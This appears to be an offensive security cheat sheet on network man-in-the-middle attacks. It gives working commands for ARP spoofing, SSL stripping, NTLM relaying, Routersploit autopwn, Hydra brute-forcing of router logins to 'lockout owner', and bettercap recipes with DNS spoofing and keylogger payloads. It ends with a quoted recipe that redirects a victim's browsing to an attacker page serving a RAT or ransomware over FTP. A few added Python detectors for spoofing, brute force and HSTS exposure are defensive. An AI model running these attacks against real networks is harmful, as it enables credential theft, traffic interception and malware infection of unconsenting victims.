Network Attacks / Harvesting / MITM
Responder - LLMNR/NBT-NS/mDNS Poisoner.
MultiRelay.py - Tool within the Responder pack to perform NTLM Relay attacks.
Operator Handbook: Responder - pg. 265
Impacket Scripts
ntlmrelayx.py: This script performs NTLM Relay Attacks, setting an SMB and HTTP Server and relaying credentials to many different protocols (SMB, HTTP, MSSQL, LDAP, IMAP, POP3, etc.). The script can be used with predefined attacks that can be triggered when a connection is relayed (e.g. create a user through LDAP) or can be executed in SOCKS mode. In this mode, for every connection relayed, it will be available to be used later on multiple times through a SOCKS proxy.
karmaSMB.py: An SMB server that answers with specific file contents regardless of the SMB share and pathname requested.
smbserver.py: A Python implementation of an SMB server. Allows you to quickly set up shares and user accounts.
Scapy - a powerful Python library that allows full packet manipulation. It is a particularly useful tool when Nmap is unavailable or when less noise on the wire is needed.
Create an IP packet with the destination field set to our target host (the dst value must be a quoted string, and the Scapy classes are imported first):
from scapy.all import IP, ICMP, sr1
IP(dst="0.0.0.0")
This can then be amended as follows to create an ICMP packet by stacking an ICMP layer on top of the IP layer:
test_packet = IP(dst="0.0.0.0")/ICMP()
The sr1() function will then send the packet on the wire and return the first reply received:
sr1(test_packet)
mitm6 - mitm6 is a pentesting tool that exploits the default configuration of Windows to take over the default DNS server. It does this by replying to DHCPv6 messages, providing victims with a link-local IPv6 address and setting the attacker's host as the default DNS server.
Flamingo - Captures credentials sprayed across the network by various IT and security products.
Operator Handbook: Flamingo - pg. 65
Inveigh - Inveigh is a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool for penetration testers.
Can be used similarly to Responder and MultiRelay
Espionage - Espionage is a network packet sniffer that intercepts large amounts of data being passed through an interface. The tool allows users to run normal and verbose traffic analysis that shows a live feed of traffic, revealing packet direction, protocols, flags, etc.
BruteShark - BruteShark is a Network Forensic Analysis Tool (NFAT) that performs deep processing and inspection of network traffic (mainly PCAP files, but it is also capable of capturing live from a network interface). It includes: extracting passwords, building a network map, reconstructing TCP sessions, extracting hashes of encrypted passwords and even converting them to Hashcat format in order to perform an offline brute-force attack.
Yersinia - A framework for layer 2 attacks
StreamDivert - Redirecting (specific) TCP, UDP and ICMP traffic to another destination.
PortBender - PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic destined for one TCP port (e.g., 445/TCP) to another TCP port (e.g., 8445/TCP).
LDAP-Password-Hunter - a tool which wraps features of getTGT.py (Impacket) and ldapsearch in order to look up passwords stored in the LDAP database.
NTLM Relay
Divert - WinDivert: Windows Packet Divert
DivertTCPconn - A TCP packet diverter for Windows platform
https://book.hacktricks.xyz/pentesting/pentesting-network#lan-attacksd
ARP cache poisoning
First you must enable IP forwarding so that packets you intercept for other hosts are forwarded on to their proper destination; otherwise the target loses connectivity
# echo 1 > /proc/sys/net/ipv4/ip_forward
Display your machine's current ARP cache
# arp -a
Use the arpspoof command to masquerade as another IP
# arpspoof -i eth0 -t [target IP] [IP to spoof as]
To set up an ARP MITM you will need to run it in both directions
# arpspoof -i eth0 -t [IP1] [IP2]
# arpspoof -i eth0 -t [IP2] [IP1]
If one of the IPs is the target's default gateway, you can then start Wireshark to capture all of the target's outbound traffic
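From the defender's side, the poisoning just described leaves a clear trace in ARP traffic. The following Python script is an added example (not from these notes or from any of the tools listed): it parses raw Ethernet/ARP frames with the standard library and flags the two symptoms that arpspoof run in both directions produces, an IP whose MAC changes and one MAC claiming both the gateway and the target. All MAC and IP values are constructed sample data.

```python
import struct
from ipaddress import IPv4Address

ETH_HDR = struct.Struct("!6s6sH")          # dst MAC, src MAC, ethertype
ARP_HDR = struct.Struct("!HHBBH6s4s6s4s")  # htype, ptype, hlen, plen, op, sha, spa, tha, tpa
ETHERTYPE_ARP, ARP_REPLY = 0x0806, 2

def parse_arp(frame: bytes):
    """Return (opcode, sender_mac, sender_ip) for an ARP frame, or None for anything else."""
    if len(frame) < ETH_HDR.size + ARP_HDR.size:
        return None
    _, _, ethertype = ETH_HDR.unpack_from(frame, 0)
    if ethertype != ETHERTYPE_ARP:
        return None
    _, _, _, _, op, sha, spa, _, _ = ARP_HDR.unpack_from(frame, ETH_HDR.size)
    return op, sha.hex(":"), str(IPv4Address(spa))

def build_arp_reply(sender_mac: bytes, sender_ip: str, target_mac: bytes, target_ip: str) -> bytes:
    """Build a constructed ARP reply frame (used only to generate the sample input below)."""
    eth = ETH_HDR.pack(target_mac, sender_mac, ETHERTYPE_ARP)
    arp = ARP_HDR.pack(1, 0x0800, 6, 4, ARP_REPLY, sender_mac, IPv4Address(sender_ip).packed,
                       target_mac, IPv4Address(target_ip).packed)
    return eth + arp

def detect_spoofing(frames):
    """Return alert strings for an IP whose MAC changes, or one MAC owning several IPs."""
    ip_to_mac, alerts = {}, []
    for frame in frames:
        parsed = parse_arp(frame)
        if parsed is None or parsed[0] != ARP_REPLY:
            continue
        _, mac, ip = parsed
        known = ip_to_mac.get(ip)
        if known is not None and known != mac:
            alerts.append(f"{ip} changed from {known} to {mac}")
        ip_to_mac[ip] = mac
        owners = sorted(i for i, m in ip_to_mac.items() if m == mac)
        if len(owners) > 1:
            alerts.append(f"{mac} claims {owners}")
    return alerts

# Constructed sample: two legitimate replies, then an attacker MAC claiming both gateway and target.
GATEWAY_MAC, TARGET_MAC, ATTACKER_MAC = (bytes.fromhex(h) for h in ("aa1122334401", "aa1122334402", "aa1122334499"))
SAMPLE_FRAMES = [
    build_arp_reply(GATEWAY_MAC, "192.168.2.1", TARGET_MAC, "192.168.2.100"),
    build_arp_reply(TARGET_MAC, "192.168.2.100", GATEWAY_MAC, "192.168.2.1"),
    build_arp_reply(ATTACKER_MAC, "192.168.2.1", TARGET_MAC, "192.168.2.100"),
    build_arp_reply(ATTACKER_MAC, "192.168.2.100", GATEWAY_MAC, "192.168.2.1"),
]
```

Running detect_spoofing(SAMPLE_FRAMES) yields three alerts: the gateway IP changing MAC, the target IP changing MAC, and the attacker MAC claiming both IPs.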
Attacks after ARP Spoofing
Sidejacking - Sniffing session tokens and using them to authenticate as the user
Use Firesheep
Hamster/Ferret - acts as a proxy server and replaces your cookies with session cookies stolen from someone else
dhcpig - DHCPig initiates an advanced DHCP exhaustion attack. It will consume all IPs on the LAN, stop new users from obtaining IPs, release any IPs in use, then for good measure send gratuitous ARP and knock all Windows hosts offline.
# pig.py eth0
SSL MITM
For an SSL MITM attack we will be using the tool ettercap
Ettercap can also be used for an ARP or DNS MITM as well
First we will start an ARP cache poisoning attack between the target and the gateway
# ettercap -Ti eth0 -M arp:remote /[ip1]/ /[ip2]/
This will cause a certificate error in the browser when users navigate to an HTTPS website, because the certificate presented by ettercap is not trusted
SSL stripping attack
We MITM the HTTP connection before it is redirected to SSL, and add the SSL layer ourselves before forwarding the packets to the web server
When the server replies, SSLstrip rewrites the HTTPS links in the response to HTTP before forwarding the packets on to the client, so the victim's side of the connection stays in plaintext.
We will run SSLstrip on port 8080, then restart arpspoof and spoof the default gateway. First redirect incoming port 80 traffic to SSLstrip's listening port:
# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
Now we start SSLstrip on that listening port.
# sslstrip -l 8080
Router Sploit - https://www.github.com/threat9/routersploit
Download and install Routersploit - a framework for exploiting routers.
# git clone https://www.github.com/threat9/routersploit
# cd routersploit
# python3 -m pip install -r requirements.txt
# python3 rsf.py
Running Routersploit
# python3 rsf.py
rsf> use scanners/autopwn
rsf> show options
rsf> set target [router ip]
rsf> run
Brute forcing the router admin interface
For when defaults don't work and you really need it.
Uses
Enable port forwarding
Change router DNS settings
Change password and lockout owner
First find a username: try whatever the default username is for that router model
Next use basic wordlists to attempt to crack the password
Process
Use Burp Suite, with Firefox proxied through it, to capture the HTTP login request
Use the Repeater tool or Hydra to brute force the password
Be aware, the Burp Suite free version throttles the number of requests you are able to perform
Hydra
hydra 192.168.0.1 http-post-form "/goform/formLogin:login=^USER^&pass=^PASS^:F=User Name or Password is incorrect." -l admin -P pass.txt -vV -f
Breaking down the syntax is as follows:
http-post-form tells Hydra you're targeting a web login form that submits HTTP POST data.
/goform/formLogin is the path of the login page, so Hydra knows where to send the requests.
login=^USER^&pass=^PASS^ is the POST data we captured from Burp Suite, but with "admin" and "PASSWORD" replaced by "^USER^" and "^PASS^" in order to tell Hydra where the username and password fields are. This way Hydra knows what to brute force.
F=User Name or Password is incorrect tells Hydra what is displayed when failed credentials are entered.
The failed-login message is what lets Hydra distinguish success from failure.
-l admin states that you're using "admin" as the username.
-P pass.txt is the password file with passwords in it line by line.
-f tells Hydra to stop once it finds a successful match.
-vV to be verbose and show the attempts.
See the Special Targets section for more tools on attacking Cisco Devices
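On the defending side, the same attack shows up in the router's (or any web server's) access log as a burst of POSTs to the login path from one source. The following Python detector is an added example, not part of these notes or of Hydra; it assumes combined-format access-log lines and the /goform/formLogin path from the command above, and the log lines are constructed samples.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Apache/nginx combined-format prefix: source, timestamp, request line, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse_line(line: str):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {"ip": m["ip"], "ts": datetime.strptime(m["ts"], TS_FMT),
            "method": m["method"], "path": m["path"], "status": int(m["status"])}

def detect_bruteforce(lines, login_path="/goform/formLogin", threshold=5, window_sec=60):
    """Return {source_ip: timestamp} for each source whose POSTs to login_path reach
    `threshold` within any `window_sec` sliding window. Status codes are ignored on
    purpose: the router form answers a bad login with 200 plus a body string, so
    only the request rate separates a brute-force run from normal use."""
    recent, alerts = defaultdict(deque), {}
    for line in lines:
        ev = parse_line(line)
        if ev is None or ev["method"] != "POST" or ev["path"] != login_path:
            continue
        q = recent[ev["ip"]]
        q.append(ev["ts"])
        while ev["ts"] - q[0] > timedelta(seconds=window_sec):  # expire old attempts
            q.popleft()
        if len(q) >= threshold and ev["ip"] not in alerts:
            alerts[ev["ip"]] = ev["ts"]
    return alerts

# Constructed sample log: one normal user, then one source hammering the login form.
SAMPLE_LOG = [
    '192.168.0.20 - - [10/Oct/2023:13:55:00 +0000] "GET /index.html HTTP/1.1" 200 1043',
    '192.168.0.20 - - [10/Oct/2023:13:55:05 +0000] "POST /goform/formLogin HTTP/1.1" 200 512',
] + [
    f'192.168.0.50 - - [10/Oct/2023:13:56:{s:02d} +0000] "POST /goform/formLogin HTTP/1.1" 200 512'
    for s in range(0, 12, 2)
]

if __name__ == "__main__":
    for ip, ts in detect_bruteforce(SAMPLE_LOG).items():
        print(f"ALERT: {ip} reached the login-POST threshold at {ts.isoformat()}")
```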
Most MITM programs use SSLStrip/SSLstrip+ to intercept HTTPS data by "downgrading" them to HTTP.
SSLStrip+ will work against TLS and SSL if HSTS is not used.
SSLStrip+ will work on anything that does not have HSTS preloaded.
SSLStrip+ will only work on non-preloaded HSTS websites.
We can intercept HTTPS non-HSTS websites but users are presented with multiple warnings before visiting the desired website.
We cannot MITM anything HSTS related (Facebook, Twitter, Instagram, etc.).
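The HSTS rules above can be checked from a site's own response headers. The following Python helper is an added example (not from these notes or from SSLstrip+): it parses a Strict-Transport-Security header value and classifies the site's exposure to stripping, assuming the preload-list requirements of a max-age of at least one year, includeSubDomains and preload; the header values are constructed samples.

```python
import re
from typing import Optional

PRELOAD_MIN_AGE = 31536000  # one year, the minimum max-age the preload list requires

def parse_hsts(header: Optional[str]) -> Optional[dict]:
    """Parse an HSTS header value into its max-age, includeSubDomains and preload parts."""
    if header is None:
        return None
    policy = {"max_age": None, "include_subdomains": False, "preload": False}
    for directive in header.split(";"):
        name, _, value = directive.strip().partition("=")
        name = name.lower()
        if name == "max-age":
            m = re.fullmatch(r'"?(\d+)"?', value.strip())  # value may be quoted
            policy["max_age"] = int(m.group(1)) if m else None
        elif name == "includesubdomains":
            policy["include_subdomains"] = True
        elif name == "preload":
            policy["preload"] = True
    return policy

def strip_exposure(header: Optional[str]) -> str:
    """Map a header (or its absence) to the exposure categories used in the notes."""
    p = parse_hsts(header)
    if p is None or p["max_age"] is None:
        return "no HSTS: downgrade possible on every visit"
    if p["max_age"] == 0:
        return "HSTS cleared (max-age=0): treated as no HSTS"
    if p["preload"] and p["include_subdomains"] and p["max_age"] >= PRELOAD_MIN_AGE:
        return "preload-eligible: downgrade blocked even on first visit once preloaded"
    return "HSTS without preload: downgrade possible only before the first HTTPS visit"

# Constructed sample header values a server might send.
SAMPLES = {
    "no-header": None,
    "short-lived": "max-age=300",
    "preloadable": "max-age=63072000; includeSubDomains; preload",
    "preload-missing-subdomains": "max-age=63072000; preload",
}

if __name__ == "__main__":
    for name, header in SAMPLES.items():
        print(f"{name}: {strip_exposure(header)}")
```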
For best results
An attacker computer running Kali directly from USB or as the host OS.
A separate computer to be the target (Windows or MacOS preferably).
Attacker and Target computer/laptops connected to the same home network as you with internet connectivity.
Restart Kali after each tool example.
BetterCap - Bettercap is a powerful, easily extensible and portable framework written in Go which aims to offer security researchers, red teamers and reverse engineers an easy-to-use, all-in-one solution with all the features they might need for reconnaissance and attacks against WiFi networks, Bluetooth Low Energy devices, wireless HID devices and Ethernet networks.
Bettercap - ARP spoofing with the HTTP proxy and sslstrip
In Kali open up a new Terminal window and type the following:
# sudo bettercap
All of the following commands below are to be entered into the bettercap window.
net.probe on
Wait 30 seconds for it to discover network hosts.
net.probe off
net.show
This will show you the targets on the network. Pay attention to your target IP.
set http.proxy.sslstrip true
set net.sniff.verbose false
set arp.spoof.targets TARGET_IP
My example:
set arp.spoof.targets 192.168.2.100
net.sniff on
http.proxy on
arp.spoof on
Bettercap - ARP spoofing with the HTTPS proxy and sslstrip
In Kali open up a new terminal window and type the following:
# sudo bettercap
All the following commands below are to be entered into the bettercap window.
net.probe on
Wait 30 seconds for it to discover network hosts.
net.probe off
net.show
This will show you the targets on the network. Pay attention to your target IP.
set https.proxy.sslstrip true
set net.sniff.verbose false
set arp.spoof.targets TARGET_IP
My example:
set arp.spoof.targets 192.168.2.100
set arp.spoof.internal true
net.sniff on
https.proxy on
arp.spoof on
Bettercap - ARP spoofing, HTTP proxy with sslstrip, and DNS spoofing to the attacker's web server
In Kali open up a new Terminal window and type the following:
# sudo service apache2 restart
# sudo bettercap
All the following commands below are to be entered into the bettercap window.
net.probe on
Wait 30 seconds for it to discover network hosts.
net.probe off
net.show
This will show you the targets on the network. Pay attention to your target IP.
set http.proxy.sslstrip true
set net.sniff.verbose false
set arp.spoof.targets TARGET_IP
My example:
set arp.spoof.targets 192.168.2.100
set dns.spoof.domains
set dns.spoof.address ATTACKER_IP
My example:
set dns.spoof.address 192.168.2.233
set dns.spoof.all true
net.sniff on
http.proxy on
arp.spoof on
dns.spoof on
Bettercap - ARP spoofing, HTTPS proxy with sslstrip, and DNS spoofing to the attacker's web server
In Kali open up a new terminal window and type the following:
# sudo service apache2 restart
# sudo bettercap
All the following commands below are to be entered into the bettercap window.
net.probe on
Wait 30 seconds for it to discover network hosts.
net.probe off
net.show
This will show you the targets on the network. Pay attention to your target IP.
set https.proxy.sslstrip true
set net.sniff.verbose false
set arp.spoof.targets TARGET_IP
My example:
set arp.spoof.targets 192.168.2.100
set dns.spoof.domains
set dns.spoof.address ATTACKER_IP
My example:
set dns.spoof.address 192.168.2.233
set dns.spoof.all true
net.sniff on
https.proxy on
arp.spoof on
dns.spoof on
Quoted directly from http://hacktownpagdenbb.onion/Links2/Chapter-11.html
Easy FTP server
In Kali open up a new Terminal window and type the following:
git clone https://github.com/byt3bl33d3r/MITMf.git
sudo cp ~/MITMf/config/captive/portal.html /var/www/html/index.html
pip3 install pyftpdlib
Bettercap has these things called "caplets" which come preinstalled that are modules that you're able to load to get a certain task done. We're going to use a bettercap caplet along with a combination of another
For this example:
My attacker computer IP is 192.168.2.233
My target computer IP is 192.168.2.100
In Kali open up a new Terminal window and type the following:
sudo service apache2 restart
sudo bettercap
All the following commands below are to be entered into the bettercap window.
net.probe on
Wait 30 seconds for it to discover network hosts.
net.probe off
net.show
This will show you the targets on the network. Pay attention for your target's IP.
set arp.spoof.targets TARGET_IP
My example:
set arp.spoof.targets 192.168.2.100
To attack the whole network:
set arp.spoof.targets *
set arp.spoof.internal true
set dns.spoof.address ATTACKER_IP
My example:
set dns.spoof.address 192.168.2.233
set hstshijack.log /usr/share/bettercap/caplets/hstshijack/ssl.log
set hstshijack.ignore *
set hstshijack.targets *.cn,*.org, www.*, *.com, *.net
set hstshijack.replacements *.ce, *.orq, wvvw.*,*.corn,*.nel
set hstshijack.obfuscate false
set hstshijack.encode true
set hstshijack.payloads *:/usr/share/bettercap/caplets/hstshijack/payloads/sslstrip.pws,*:/usr/share/bettercap/caplets/hstshijack/payloads/keylogger.pws,*.google.com:/usr/share/bettercap/caplets/hstshijack/payloads/google.pws,google.com:/usr/share/bettercap/caplets/hstshijack/payloads/google.pws
The above command "set hstshijack.payloads ..." is all one line so please copy and paste it.
http.proxy on
arp.spoof on
dns.spoof on
Leave the bettercap window running.
This attack will completely break the web browser and not allow the target to visit any HTTPS or HTTP website. Any web requests will be re-routed to our attacker page. If they type anything into the URL bar in Google Chrome when running this attack Chrome will recommend the HTTP version of what they're looking for and "help" the victim navigate to our web attack page which is great for us! In order to deliver your malware in the future you would need to edit /var/www/html/index.html to reflect your own file. Remember, in this chapter we copied the ~/MITMf/config/captive/portal.html to /var/www/html/index.html. For my example my malware will be called "DANGER.exe" and the file is located in "/var/www/html" which is the default Apache2 web server directory. If you had a RAT you would need to put the file into the "/var/www/html" directory and adjust the filename in /var/www/html/index.html to reflect your own RAT executable name. Obviously! We're going to navigate to /var/www/html and run an FTP server delivering the contents of that directory and we're going to alter /var/www/html/index.html to reflect our executable name. This will allow the target to download our malware over FTP since we're re-directing everything web related on the network.
In Kali open up a new Terminal window and type the following:
cd /var/www/html
python3 -m pyftpdlib -w
This will run an FTP server on port 2121. Leave this window running. If you're familiar with python the above command "python3 -m pyftpdlib -w" is the "python -m SimpleHTTPServer 80" equivalent but for FTP. In a nutshell it's a super easy way of bringing up an FTP server without config files and shit. You can script all this shit so it's automatic depending on your coding levels. Basic shit commander Cobra.
In Kali open up a new Terminal window and type the following:
sudo leafpad /var/www/html/index.html
Change "CaptiveClient.exe" to "ftp://ATTACKER_IP:2121/YOUR_FILE.exe"
My Example: ftp://192.168.2.233:2121/DANGER.exe
Save the file and close it.
Now that we have the /var/www/html/index.html file configured (you would need to replace DANGER.exe with your RAT filename. This should be obvious!) the attack is ready. In the future you'd want to run the FTP server before using bettercap. This attack will break all HTTPS and HTTP websites the victim is trying to browse and will re-direct them to your web server with your malware/ransomware waiting to be downloaded over FTP.